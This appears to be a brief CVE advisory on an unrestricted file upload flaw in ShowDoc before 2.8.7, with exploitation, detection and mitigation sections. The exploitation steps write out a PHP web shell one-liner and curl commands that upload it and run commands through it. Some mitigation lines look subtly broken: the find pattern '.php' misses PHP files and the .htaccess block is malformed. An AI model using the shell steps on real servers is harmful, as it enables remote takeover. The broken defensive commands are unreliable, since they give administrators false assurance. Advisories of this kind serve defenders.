How the CVE Works
The vulnerability in ShowDoc before version 2.8.7 arises from insufficient validation of file extensions during uploads. Attackers can bypass security checks by uploading malicious PHP files disguised with allowed extensions (e.g., .jpg.php). Once uploaded, these files can be executed on the server, enabling remote code execution (RCE). The lack of proper sanitization in the file upload handler allows attackers to take full control of the affected system.
DailyCVE Form:
Platform: ShowDoc
Version: < 2.8.7
Vulnerability: Unrestricted file upload
Severity: Critical
Date: Apr 29, 2025
What Undercode Say:
Exploitation:
1. Craft a malicious PHP file (e.g., `shell.php`):
<?php system($_GET['cmd']); ?>
2. Upload it via ShowDoc’s file upload endpoint:
curl -F "[email protected]" http://target/showdoc/upload.php
3. Execute commands via the uploaded shell:
curl http://target/uploads/shell.php?cmd=id
Detection:
Check for vulnerable versions:
grep -r "ShowDoc Version" /var/www/html/
Mitigation:
1. Update to ShowDoc 2.8.7 or later.
2. Implement file extension whitelisting:
$allowed = ['jpg', 'png'];
$ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, $allowed)) { die("Invalid file"); }
3. Disable PHP execution in upload directories via .htaccess:
<Files .php> Deny from all </Files>
Additional Checks:
- Audit existing uploads for suspicious files:
find /var/www/html/uploads -name ".php"
- Monitor server logs for upload attempts:
tail -f /var/log/apache2/access.log | grep "upload.php"
Patch Reference:
Apply the official fix from ShowDoc’s GitHub repository.
(End of report, no additional words.)
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
